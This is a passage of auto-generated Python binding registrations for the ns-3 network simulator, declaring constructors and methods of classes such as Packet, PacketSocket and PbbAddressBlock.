cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
cls.add_method('Get',
'ns3::ObjectFactory',
[],
is_const=True)
## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::ObjectFactory const &', 'value')])
return
def register_Ns3OutputStreamWrapper_methods(root_module, cls):
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(ns3::OutputStreamWrapper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::OutputStreamWrapper const &', 'arg0')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::string filename, std::_Ios_Openmode filemode) [constructor]
cls.add_constructor([param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::ostream * os) [constructor]
cls.add_constructor([param('std::ostream *', 'os')])
## output-stream-wrapper.h (module 'network'): std::ostream * ns3::OutputStreamWrapper::GetStream() [member function]
cls.add_method('GetStream',
'std::ostream *',
[])
return
def register_Ns3Packet_methods(root_module, cls):
cls.add_output_stream_operator()
## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
cls.add_constructor([])
## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
cls.add_constructor([param('ns3::Packet const &', 'o')])
## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
cls.add_constructor([param('uint32_t', 'size')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddByteTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header')])
## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddPacketTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer')])
## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
cls.add_method('EnablePrinting',
'void',
[],
is_static=True)
## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
cls.add_method('FindFirstMatchingByteTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
cls.add_method('GetByteTagIterator',
'ns3::ByteTagIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
cls.add_method('GetNixVector',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
cls.add_method('GetPacketTagIterator',
'ns3::PacketTagIterator',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet.h (module 'network'): uint8_t const * ns3::Packet::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
deprecated=True, is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
cls.add_method('PeekHeader',
'uint32_t',
[param('ns3::Header &', 'header')],
is_const=True)
## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
cls.add_method('PeekPacketTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('PeekTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
cls.add_method('PrintByteTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
cls.add_method('PrintPacketTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
cls.add_method('RemoveAllByteTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
cls.add_method('RemoveAllPacketTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
cls.add_method('RemoveHeader',
'uint32_t',
[param('ns3::Header &', 'header')])
## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
cls.add_method('RemovePacketTag',
'bool',
[param('ns3::Tag &', 'tag')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('RemoveTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> arg0) [member function]
cls.add_method('SetNixVector',
'void',
[param('ns3::Ptr< ns3::NixVector >', 'arg0')])
return
def register_Ns3PacketSocket_methods(root_module, cls):
## packet-socket.h (module 'network'): ns3::PacketSocket::PacketSocket(ns3::PacketSocket const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocket const &', 'arg0')])
## packet-socket.h (module 'network'): ns3::PacketSocket::PacketSocket() [constructor]
cls.add_constructor([])
## packet-socket.h (module 'network'): int ns3::PacketSocket::Bind() [member function]
cls.add_method('Bind',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Bind(ns3::Address const & address) [member function]
cls.add_method('Bind',
'int',
[param('ns3::Address const &', 'address')],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Bind6() [member function]
cls.add_method('Bind6',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Close() [member function]
cls.add_method('Close',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Connect(ns3::Address const & address) [member function]
cls.add_method('Connect',
'int',
[param('ns3::Address const &', 'address')],
is_virtual=True)
## packet-socket.h (module 'network'): bool ns3::PacketSocket::GetAllowBroadcast() const [member function]
cls.add_method('GetAllowBroadcast',
'bool',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): ns3::Socket::SocketErrno ns3::PacketSocket::GetErrno() const [member function]
cls.add_method('GetErrno',
'ns3::Socket::SocketErrno',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::PacketSocket::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): uint32_t ns3::PacketSocket::GetRxAvailable() const [member function]
cls.add_method('GetRxAvailable',
'uint32_t',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::GetSockName(ns3::Address & address) const [member function]
cls.add_method('GetSockName',
'int',
[param('ns3::Address &', 'address')],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): ns3::Socket::SocketType ns3::PacketSocket::GetSocketType() const [member function]
cls.add_method('GetSocketType',
'ns3::Socket::SocketType',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): uint32_t ns3::PacketSocket::GetTxAvailable() const [member function]
cls.add_method('GetTxAvailable',
'uint32_t',
[],
is_const=True, is_virtual=True)
## packet-socket.h (module 'network'): static ns3::TypeId ns3::PacketSocket::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Listen() [member function]
cls.add_method('Listen',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::PacketSocket::Recv(uint32_t maxSize, uint32_t flags) [member function]
cls.add_method('Recv',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags')],
is_virtual=True)
## packet-socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::PacketSocket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
cls.add_method('RecvFrom',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
cls.add_method('Send',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
cls.add_method('SendTo',
'int',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')],
is_virtual=True)
## packet-socket.h (module 'network'): bool ns3::PacketSocket::SetAllowBroadcast(bool allowBroadcast) [member function]
cls.add_method('SetAllowBroadcast',
'bool',
[param('bool', 'allowBroadcast')],
is_virtual=True)
## packet-socket.h (module 'network'): void ns3::PacketSocket::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## packet-socket.h (module 'network'): int ns3::PacketSocket::ShutdownRecv() [member function]
cls.add_method('ShutdownRecv',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): int ns3::PacketSocket::ShutdownSend() [member function]
cls.add_method('ShutdownSend',
'int',
[],
is_virtual=True)
## packet-socket.h (module 'network'): void ns3::PacketSocket::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3PacketSocketFactory_methods(root_module, cls):
## packet-socket-factory.h (module 'network'): ns3::PacketSocketFactory::PacketSocketFactory(ns3::PacketSocketFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PacketSocketFactory const &', 'arg0')])
## packet-socket-factory.h (module 'network'): ns3::PacketSocketFactory::PacketSocketFactory() [constructor]
cls.add_constructor([])
## packet-socket-factory.h (module 'network'): ns3::Ptr<ns3::Socket> ns3::PacketSocketFactory::CreateSocket() [member function]
cls.add_method('CreateSocket',
'ns3::Ptr< ns3::Socket >',
[],
is_virtual=True)
## packet-socket-factory.h (module 'network'): static ns3::TypeId ns3::PacketSocketFactory::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3PbbAddressBlock_methods(root_module, cls):
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('!=')
## packetbb.h (module 'network'): ns3::PbbAddressBlock::PbbAddressBlock(ns3::PbbAddressBlock const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressBlock const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressBlock::PbbAddressBlock() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlock::AddressBack() const [member function]
cls.add_method('AddressBack',
'ns3::Address',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressBegin() [member function]
cls.add_method('AddressBegin',
'std::_List_iterator< ns3::Address >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Address> ns3::PbbAddressBlock::AddressBegin() const [member function]
cls.add_method('AddressBegin',
'std::_List_const_iterator< ns3::Address >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressClear() [member function]
cls.add_method('AddressClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbAddressBlock::AddressEmpty() const [member function]
cls.add_method('AddressEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressEnd() [member function]
cls.add_method('AddressEnd',
'std::_List_iterator< ns3::Address >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Address> ns3::PbbAddressBlock::AddressEnd() const [member function]
cls.add_method('AddressEnd',
'std::_List_const_iterator< ns3::Address >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressErase(std::_List_iterator<ns3::Address> position) [member function]
cls.add_method('AddressErase',
'std::_List_iterator< ns3::Address >',
[param('std::_List_iterator< ns3::Address >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressErase(std::_List_iterator<ns3::Address> first, std::_List_iterator<ns3::Address> last) [member function]
cls.add_method('AddressErase',
'std::_List_iterator< ns3::Address >',
[param('std::_List_iterator< ns3::Address >', 'first'), param('std::_List_iterator< ns3::Address >', 'last')])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlock::AddressFront() const [member function]
cls.add_method('AddressFront',
'ns3::Address',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Address> ns3::PbbAddressBlock::AddressInsert(std::_List_iterator<ns3::Address> position, ns3::Address const value) [member function]
cls.add_method('AddressInsert',
'std::_List_iterator< ns3::Address >',
[param('std::_List_iterator< ns3::Address >', 'position'), param('ns3::Address const', 'value')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPopBack() [member function]
cls.add_method('AddressPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPopFront() [member function]
cls.add_method('AddressPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPushBack(ns3::Address address) [member function]
cls.add_method('AddressPushBack',
'void',
[param('ns3::Address', 'address')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::AddressPushFront(ns3::Address address) [member function]
cls.add_method('AddressPushFront',
'void',
[param('ns3::Address', 'address')])
## packetbb.h (module 'network'): int ns3::PbbAddressBlock::AddressSize() const [member function]
cls.add_method('AddressSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Deserialize(ns3::Buffer::Iterator & start) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')])
## packetbb.h (module 'network'): uint32_t ns3::PbbAddressBlock::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlock::PrefixBack() const [member function]
cls.add_method('PrefixBack',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixBegin() [member function]
cls.add_method('PrefixBegin',
'std::_List_iterator< unsigned char >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<unsigned char> ns3::PbbAddressBlock::PrefixBegin() const [member function]
cls.add_method('PrefixBegin',
'std::_List_const_iterator< unsigned char >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixClear() [member function]
cls.add_method('PrefixClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbAddressBlock::PrefixEmpty() const [member function]
cls.add_method('PrefixEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixEnd() [member function]
cls.add_method('PrefixEnd',
'std::_List_iterator< unsigned char >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<unsigned char> ns3::PbbAddressBlock::PrefixEnd() const [member function]
cls.add_method('PrefixEnd',
'std::_List_const_iterator< unsigned char >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixErase(std::_List_iterator<unsigned char> position) [member function]
cls.add_method('PrefixErase',
'std::_List_iterator< unsigned char >',
[param('std::_List_iterator< unsigned char >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixErase(std::_List_iterator<unsigned char> first, std::_List_iterator<unsigned char> last) [member function]
cls.add_method('PrefixErase',
'std::_List_iterator< unsigned char >',
[param('std::_List_iterator< unsigned char >', 'first'), param('std::_List_iterator< unsigned char >', 'last')])
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlock::PrefixFront() const [member function]
cls.add_method('PrefixFront',
'uint8_t',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<unsigned char> ns3::PbbAddressBlock::PrefixInsert(std::_List_iterator<unsigned char> position, uint8_t const value) [member function]
cls.add_method('PrefixInsert',
'std::_List_iterator< unsigned char >',
[param('std::_List_iterator< unsigned char >', 'position'), param('uint8_t const', 'value')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPopBack() [member function]
cls.add_method('PrefixPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPopFront() [member function]
cls.add_method('PrefixPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPushBack(uint8_t prefix) [member function]
cls.add_method('PrefixPushBack',
'void',
[param('uint8_t', 'prefix')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrefixPushFront(uint8_t prefix) [member function]
cls.add_method('PrefixPushFront',
'void',
[param('uint8_t', 'prefix')])
## packetbb.h (module 'network'): int ns3::PbbAddressBlock::PrefixSize() const [member function]
cls.add_method('PrefixSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Print(std::ostream & os, int level) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os'), param('int', 'level')],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::Serialize(ns3::Buffer::Iterator & start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator &', 'start')],
is_const=True)
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressBlock::TlvBack() [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbAddressTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> const ns3::PbbAddressBlock::TlvBack() const [member function]
cls.add_method('TlvBack',
'ns3::Ptr< ns3::PbbAddressTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvBegin() [member function]
cls.add_method('TlvBegin',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvBegin() const [member function]
cls.add_method('TlvBegin',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvClear() [member function]
cls.add_method('TlvClear',
'void',
[])
## packetbb.h (module 'network'): bool ns3::PbbAddressBlock::TlvEmpty() const [member function]
cls.add_method('TlvEmpty',
'bool',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvEnd() [member function]
cls.add_method('TlvEnd',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[])
## packetbb.h (module 'network'): std::_List_const_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvEnd() const [member function]
cls.add_method('TlvEnd',
'std::_List_const_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position')])
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvErase(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > first, std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > last) [member function]
cls.add_method('TlvErase',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'first'), param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'last')])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> ns3::PbbAddressBlock::TlvFront() [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbAddressTlv >',
[])
## packetbb.h (module 'network'): ns3::Ptr<ns3::PbbAddressTlv> const ns3::PbbAddressBlock::TlvFront() const [member function]
cls.add_method('TlvFront',
'ns3::Ptr< ns3::PbbAddressTlv > const',
[],
is_const=True)
## packetbb.h (module 'network'): std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > ns3::PbbAddressBlock::TlvInsert(std::_List_iterator<ns3::Ptr<ns3::PbbAddressTlv> > position, ns3::Ptr<ns3::PbbTlv> const value) [member function]
cls.add_method('TlvInsert',
'std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >',
[param('std::_List_iterator< ns3::Ptr< ns3::PbbAddressTlv > >', 'position'), param('ns3::Ptr< ns3::PbbTlv > const', 'value')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPopBack() [member function]
cls.add_method('TlvPopBack',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPopFront() [member function]
cls.add_method('TlvPopFront',
'void',
[])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPushBack(ns3::Ptr<ns3::PbbAddressTlv> address) [member function]
cls.add_method('TlvPushBack',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'address')])
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::TlvPushFront(ns3::Ptr<ns3::PbbAddressTlv> address) [member function]
cls.add_method('TlvPushFront',
'void',
[param('ns3::Ptr< ns3::PbbAddressTlv >', 'address')])
## packetbb.h (module 'network'): int ns3::PbbAddressBlock::TlvSize() const [member function]
cls.add_method('TlvSize',
'int',
[],
is_const=True)
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlock::DeserializeAddress(uint8_t * buffer) const [member function]
cls.add_method('DeserializeAddress',
'ns3::Address',
[param('uint8_t *', 'buffer')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlock::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'uint8_t',
[],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::PrintAddress(std::ostream & os, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('PrintAddress',
'void',
[param('std::ostream &', 'os'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlock::SerializeAddress(uint8_t * buffer, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('SerializeAddress',
'void',
[param('uint8_t *', 'buffer'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_pure_virtual=True, is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbAddressBlockIpv4_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv4::PbbAddressBlockIpv4(ns3::PbbAddressBlockIpv4 const & arg0) [copy constructor]
cls.add_constructor([param('ns3::PbbAddressBlockIpv4 const &', 'arg0')])
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv4::PbbAddressBlockIpv4() [constructor]
cls.add_constructor([])
## packetbb.h (module 'network'): ns3::Address ns3::PbbAddressBlockIpv4::DeserializeAddress(uint8_t * buffer) const [member function]
cls.add_method('DeserializeAddress',
'ns3::Address',
[param('uint8_t *', 'buffer')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): uint8_t ns3::PbbAddressBlockIpv4::GetAddressLength() const [member function]
cls.add_method('GetAddressLength',
'uint8_t',
[],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv4::PrintAddress(std::ostream & os, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('PrintAddress',
'void',
[param('std::ostream &', 'os'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
## packetbb.h (module 'network'): void ns3::PbbAddressBlockIpv4::SerializeAddress(uint8_t * buffer, std::_List_const_iterator<ns3::Address> iter) const [member function]
cls.add_method('SerializeAddress',
'void',
[param('uint8_t *', 'buffer'), param('std::_List_const_iterator< ns3::Address >', 'iter')],
is_const=True, visibility='protected', is_virtual=True)
return
def register_Ns3PbbAddressBlockIpv6_methods(root_module, cls):
## packetbb.h (module 'network'): ns3::PbbAddressBlockIpv6::PbbAddressBlockIpv6(ns3::PbbAddressBlockIpv6 const & arg0) [copy constructor]
